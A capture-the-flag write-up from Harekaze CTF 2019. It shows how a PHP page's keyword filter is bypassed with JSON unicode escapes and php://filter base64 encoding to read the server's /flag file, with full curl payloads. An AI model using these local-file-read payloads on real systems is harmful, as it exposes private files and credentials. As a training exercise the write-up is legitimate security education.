Content-Type: text/plain

(Part of a series of writeups from Harekaze CTF 2019.)

The challenge text reads:

I made a strong WAF, so you definitely can’t read the flag!


We are given the source code, a link to the website, and a subtle hint.

$ tree
├── chall
│   ├── index.html
│   ├── pages
│   │   ├── about.html
│   │   └── lorem.html
│   └── query.php
├── Dockerfile
└── php.ini

2 directories, 6 files

The Dockerfile is the environment the webapp runs in so it's worth taking a look at first.

FROM php:7.3-apache

COPY ./php.ini $PHP_INI_DIR/php.ini
COPY ./chall /var/www/html
RUN echo "HarekazeCTF{<redacted>}" > /flag


The RUN ... > /flag line tells us that the flag is in a file called flag at the root of the filesystem, a handy thing to know.

Clicking on the link reveals beautiful modern design.


JavaScript on the index.html page intercepts clicks to About and Lorem Ipsum and performs a JSON POST request to query.php, asking for the contents of page.

window.addEventListener('DOMContentLoaded', () => {
  let content = document.getElementById('content');
  for (let link of document.getElementsByClassName('link')) {
    link.addEventListener('click', () => {
      fetch('query.php', {
        'method': 'POST',
        'headers': {
          'Content-Type': 'application/json'
        'body': JSON.stringify({
          'page': link.href.split('#')[1]
      }).then(resp => resp.json()).then(resp => {
        content.innerHTML = resp.content;
      return false;
    }, false);
}, false);

On the server side, query.php handles the request and serves the response with a suspicious-looking call to file_get_contents.


if (isset($_GET['source'])) {

function is_valid($str) {
  $banword = [
    // no path traversal
    // no stream wrapper
    // no data exfiltration
  $regexp = '/' . implode('|', $banword) . '/i';
  if (preg_match($regexp, $str)) {
    return false;
  return true;

$body = file_get_contents('php://input');
$json = json_decode($body, true);

if (is_valid($body) && isset($json) && isset($json['page'])) {
  $page = $json['page'];
  $content = file_get_contents($page);
  if (!$content || !is_valid($content)) {
    $content = "<p>not found</p>\n";
} else {
  $content = '<p>invalid request</p>';

// no data exfiltration!!!
$content = preg_replace('/HarekazeCTF\{.+\}/i',
    'HarekazeCTF{&lt;censored&gt;}', $content);
echo json_encode(['content' => $content]);

PHP has a habit of doing too much at once, leading to innocent code doing something unexpected. PHP's stream, protocol, and fopen wrappers are often culprits. Generally, if untrusted input can find its way into file_get_contents, you are probably in trouble.

Despite the author's attempts to mitigate path traversal and data exfiltration, they've made some fatal errors that will ultimately lead us to steal the flag.

Our eyes are drawn to the following sloppiness.

$body = file_get_contents('php://input');
$json = json_decode($body, true);

if (is_valid($body) && isset($json) && isset($json['page'])) {
  $page = $json['page'];
  $content = file_get_contents($page);
  // ...

The issue here is premature validation. The is_valid function is applied to $body before it goes through json_decode, not afterwards.

JSON decoding involves processing escape sequences, so if escape sequences can be used to obfuscate the input then the validation code will be bypassed without affecting the final (decoded) string.

Let's look at the JSON specification's definition for a string.

JSON supports unicode escapes of the form \uXXXX, where XXXX is the 4 hex digits representing the unicode code point of the character.

For example the letter A is 0x41 and represented as \u0041.

$ echo '{ "page": "\u0041\u0041\u0041\u0041" }' | jq

  "page": "AAAA"

The tool uni2ascii can convert ASCII text to unicode escapes.

$ echo '/flag' | uni2ascii -qpa L


Armed with our obfuscated payload, all that's left to do is POST off the request to read /flag, and we should be done.

$ curl -X POST \
    -d "{\"page\":\"\u002F\u0066\u006C\u0061\u0067\"}" \
    -H 'Content-Type: application/json' \


Oh, wait, there's that part of the code that filters the content on the way out.

// no data exfiltration!!!
$content = preg_replace(

As mentioned earlier, where there's untrusted user input to file_get_contents, there's room for PHP to add a stream wrapper that can do crazy things that happen to help us in unexpected ways.

A little bit of research revealed that there is a wrapper called php://filter that can not only read files, but also convert them to base64 strings!

php://filter is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read.


So, the final payload becomes...


When this is directly passed to file_get_contents, PHP will read /flag and convert it to a base64 encoded string thus bypassing the final layer of protection.

$ curl -X POST \
     -d "{\"page\":\"\u0070\u0068\u0070\u003A\u002F\u002F\u0066\u0069\u006C\u0074\u0065\u0072\u002F\u0063\u006F\u006E\u0076\u0065\u0072\u0074\u002E\u0062\u0061\u0073\u0065\u0036\u0034\u002D\u0065\u006E\u0063\u006F\u0064\u0065\u002F\u0072\u0065\u0073\u006F\u0075\u0072\u0063\u0065\u003D\u002F\u0066\u006C\u0061\u0067\"}" \
     -H 'Content-Type: application/json' \


The response is base64 encoded.

$ echo 'SGFyZWthemVDVEZ7dHVydXRhcmFfdGF0dGF0dGFfcml0dGF9Cg==' | base64 -d